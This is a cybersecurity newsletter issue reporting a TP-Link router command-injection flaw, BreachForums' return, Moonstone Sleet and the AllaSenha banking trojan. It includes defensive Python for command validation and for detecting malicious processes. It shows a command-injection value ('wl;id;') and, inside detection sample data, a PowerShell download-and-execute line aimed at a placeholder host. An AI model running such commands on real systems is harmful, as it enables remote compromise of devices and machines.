BreachForums is back

May 31 2024


Welcome to Gone Phishing, your daily cybersecurity newsletter that's blowing up like a vindaloo 💥💥💥

It's Friday, folks, which can only mean one thing… It's time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the week. Okay, that's it.

Congrats, the cybercriminals are no match… for your patch! 🩹🩹🩹

Game on 🎮🕹️👾

⚠️ Urgent Update: Critical Security Flaw in TP-Link Archer C5400X Router 🚨

A maximum-severity vulnerability (CVE-2024-5035, CVSS 10.0) in the TP-Link Archer C5400X gaming router has been disclosed, allowing remote code execution via specially crafted requests. 💥 The flaw impacts all firmware versions up to 1_1.1.6 and has been patched in version 1_1.1.7, released on May 24, 2024. 🛠️

Exploit Details 📝

  • The flaw resides in the "rftest" binary, which exposes a network listener on TCP ports 8888, 8889, and 8890.

  • Attackers can bypass command restrictions by injecting shell meta-characters (e.g., "wl;id;") to gain arbitrary command execution with elevated privileges.

Patch Information 🩹

The new firmware version 1_1.1.7 Build 20240510 mitigates the issue by discarding commands containing special characters.
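As an added example, not code from TP-Link or ONEKEY, here is the difference between the two validation styles in Python: the denylist the patch is described as using, beside a stricter allowlist that also refuses any subcommand the listener was never meant to expose. The subcommand names and the argument shape are assumptions.

```python
import re

# Characters that turn a single command into a pipeline, a substitution or a
# second command once the string reaches a shell via system()/popen().
SHELL_META = frozenset(";&|`$(){}<>\n\r\\\"'*?~")

# Hypothetical allowlist of subcommands the listener is meant to accept; the
# real rftest command set is not given in the item above.
ALLOWED_SUBCOMMANDS = frozenset({"wl", "nvram"})
SAFE_ARG = re.compile(r"^[A-Za-z0-9_.:=-]{1,64}$")


def has_shell_metachar(cmd: str) -> bool:
    """Denylist check in the spirit of the 1_1.1.7 fix: discard any command
    that carries a shell metacharacter."""
    return any(ch in SHELL_META for ch in cmd)


def parse_allowlisted(cmd: str):
    """Positive model: return an argv list when the first token is a known
    subcommand and every argument fits a tight character class, else None."""
    parts = cmd.split()
    if not parts or parts[0] not in ALLOWED_SUBCOMMANDS:
        return None
    if not all(SAFE_ARG.match(arg) for arg in parts[1:]):
        return None
    return parts


def accept(cmd: str):
    """Layer both checks. A returned argv is meant for an exec-style call
    (subprocess.run(argv) without shell=True), never for system()."""
    if has_shell_metachar(cmd):
        return None
    return parse_allowlisted(cmd)
```

The denylist alone still passes "reboot" and the allowlist alone still passes a newline-separated "wl\nid", which is why the two are layered and the result is executed without a shell.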

Security Advice 🛡️

Update your TP-Link Archer C5400X router to the latest firmware immediately to protect against potential exploitation.

This fix is critical to prevent remote unauthenticated attackers from gaining control over your device.

Background 🏞️

The flaw was discovered by German cybersecurity firm ONEKEY, emphasising the importance of securing wireless device configuration APIs.

The disclosure follows recent vulnerabilities in other networking devices, highlighting ongoing security challenges.

Now, on to today's hottest cybersecurity news stories:

  • 💬 BreachForums is back with a brand new agenda 🆕

  • 🌙 Introducing Moonstone Sleet, N. Korea's latest 🥡

  • 🏧 Brazilian banks hit with AllaKore variant = AllaSenha 👨‍💻

Breach, Breach; it's the sound of da police 🚨👮🚔

🚨 BreachForums Bounces Back! 👋🏻

Just two weeks after a major U.S. law enforcement takedown, the notorious BreachForums is back in action at breachforums[.]st! 🚀 The revival was announced by ShinyHunters, who is now selling a massive 1.3 TB database of 560 million Ticketmaster customers for $500,000. 😲

What's Inside? 📦

The database allegedly contains:

  • Full names, addresses, email addresses, phone numbers

  • Ticket sales and event info

  • Last four digits of credit cards and expiration dates 💳

Sign-Up Required! ⚠️

Visitors now need to sign up for an account to view content. 📝

Law Enforcement Strikes 👮

Earlier, U.S. authorities dismantled BreachForums and seized its domains (.st/.cx/.is/.vc) and Baphomet's Telegram channel. The FBI is reviewing backend data. 🕵️‍♂️

Who's Behind It? 👤

It's unclear if the current ShinyHunters is the original hacker. The domain was reportedly reclaimed from NiceNIC. Is it a honeypot? Cybersecurity experts are sceptical. 🤔

A Brief History 📜

BreachForums rose in March 2022 post-RaidForums' shutdown and re-emerged in mid-June 2023 after another takedown. The DoJ and FBI have yet to comment on the latest developments. 🕶️

Stay tuned for more updates on this unfolding cyber drama!

Hackers: Fly me to the Moonstone 💀💀💀

🚨 New North Korean Cyber Threat: Moonstone Sleet Strikes! 🌙

A new North Korean cyber threat actor, Moonstone Sleet, is targeting software, IT, education, and defence sectors with sophisticated ransomware and malware. 🚀 This group is closely linked to the infamous Lazarus Group.

Deceptive Tactics 🎭

Moonstone Sleet sets up fake companies and job offers, using trojanized tools, malicious games, and custom ransomware. They employ both tried-and-true and unique methods to achieve their goals. 🎭

Fake Jobs and Malicious Tools 🛠️

  • Fake job offers and companies lure targets in

  • Trojanized tools like modified PuTTY drop malicious payloads

  • Malicious npm packages delivered through LinkedIn and freelancing sites 🧑‍💻

Dangerous Malware 👾

Their attacks involve:

  • Custom ransomware FakePenny

  • Malicious game DeTankWar with embedded malware loaders 🎮

  • Credential theft from the Windows LSASS process 🛡️

Unique Strategies ♟️

Moonstone Sleet creates fake companies (e.g., C.C. Waterfall, StarGlow Ventures) to approach targets, often posing as blockchain or software development firms. Emails often include tracking pixels to gauge interest. 📧

Recent Attacks ⚔️

Recent campaigns include targeting defence companies with ransomware demanding $6.6 million in Bitcoin. Microsoft urges vigilance against supply chain attacks. 💼

Evolving Threat

Moonstone Sleet's tactics have evolved from other North Korean threat actors, demonstrating their growing sophistication and ambition. Stay alert and secure! 🚨

🎣 Catch of the Day!! 🌊🐟🦞

Stay ahead of the curve with Presspool.ai! 🚀 Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." 🤓💡 That's us, alright! 🤵 How about you? Visionary AI executive, much? 👀

And if the newsletter gets your motor running, then you can take a butcher's at their cool AI marketing product too, which is sure to help you make the most of our new artificial overlords and put them to work for your business 🤖👩‍💻

Rest assured, the process is very straightforward.

You simply:

🆕 Sign Up & Create Campaign

📊 Define your audience, budget, and message to captivate your audience.

🚀 Launch your campaign, as Presspool's AI matches it with ideal newsletter audiences for optimal reach and conversions. 🎯

🕵️ Finally, you leverage real-time analytics to track performance and refine future strategies. 📈 Elevate your marketing game and stay informed with Presspool.ai! 🌟 Simples! 🦦

Presspool.ai 📰🤖 may just have what you need to succeed. And if the product isn't for you, the newsletter alone is a gamechanger. And we know newsletters 😉

An inconvenient struth: Forget Al Gore; meet AllaKore 😬😬😬

🚨 Brazilian Banks Under Cyber Attack by AllaSenha! 🕋

Brazilian banks are facing a new cyber threat: a custom variant of the AllaKore RAT called AllaSenha. This malware targets banking credentials using Azure cloud for command-and-control. 🏦

Who's at Risk? ❓

Targets include major banks like Banco do Brasil, Bradesco, Itaú Unibanco, and more. The attack likely starts with phishing messages containing malicious links. 📧

How It Works 🛠️

  • LNK File Trick: A malicious shortcut file (NotaFiscal.pdf.lnk) is disguised as a PDF.

  • BAT Payload: Launches a Base64-encoded PowerShell command.

  • Python and DLL: Downloads Python, runs a script (BPyCode), and loads a DLL in memory. 🐍
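As an added example, not from the research the item summarises, the following Python triage runs over constructed process-creation events and flags the three stages described above: a double-extension LNK, a Base64-encoded PowerShell command that decodes to a download-and-execute, and a Python interpreter launched from a user-writable path. The event fields, user name and paths are assumptions.

```python
import base64
import re

# Patterns for the stages of the chain described above.
DOUBLE_EXT_LNK = re.compile(r"\.(?:pdf|docx?|xlsx?|jpe?g|png)\.lnk\b", re.I)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_EXEC = ("downloadstring", "downloadfile", "invoke-webrequest", "iex ", "invoke-expression")
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(?:appdata|downloads)\\|\\temp\\", re.I)


def decode_encoded_command(cmdline: str):
    """Return the -EncodedCommand payload decoded from UTF-16LE Base64, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> list:
    """Return the reasons a process-creation event matches the chain (empty if none)."""
    reasons = []
    cmdline, image = event["cmdline"], event["image"].lower()
    if DOUBLE_EXT_LNK.search(cmdline):
        reasons.append("double-extension LNK")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded PowerShell")
        if any(k in decoded.lower() for k in DOWNLOAD_EXEC):
            reasons.append("download/execute in decoded command")
    if image.endswith("python.exe") and USER_WRITABLE.search(cmdline):
        reasons.append("python interpreter run from user-writable path")
    return reasons


def _enc(ps: str) -> str:
    """Encode a PowerShell string the way -EncodedCommand expects (UTF-16LE, Base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed sample events (hypothetical user name and paths, not real telemetry).
SAMPLE_EVENTS = [
    {"image": "cmd.exe", "cmdline": r'cmd.exe /c "C:\Users\ana\Downloads\NotaFiscal.pdf.lnk"'},
    {"image": "powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')")},
    {"image": "python.exe", "cmdline": r"C:\Users\ana\AppData\Local\Temp\py\python.exe BPyCode.py"},
    {"image": "winword.exe", "cmdline": r'"C:\Program Files\Microsoft Office\winword.exe" C:\Users\ana\report.docx'},
]
```

Decoding the encoded command before matching matters because the download-and-execute keywords never appear in the raw command line.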

Malicious Operations 😈

AllaSenha steals credentials and captures 2FA codes using overlay windows. It can even trick users into scanning QR codes for fraudulent transactions. 😱

Key Findings 🔑

  • Cloud C2: Uses Microsoft Azure Functions for flexible infrastructure.

  • Portuguese-Speaking Developer: Likely linked to a user named bert1m.

  • High Productivity: Latin American threat actors are prolific in cybercrime campaigns.

Wider Impact

These attacks, while focusing on Latin America, often affect global companies. Malspam campaigns with banking trojans like Casbaneiro are also targeting financial data. 📊

Mobile Threats 📱

Not just Windows – Android banking trojan Anatsa infiltrated the Google Play Store, disguised as productivity apps, stealing banking credentials through overlays. 📲

Stay Vigilant! 👀

Protect your accounts and stay aware of phishing tactics. Cybersecurity measures are crucial to defending against these sophisticated attacks. 🛡️

See you next week, cyber squad 🥂

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!
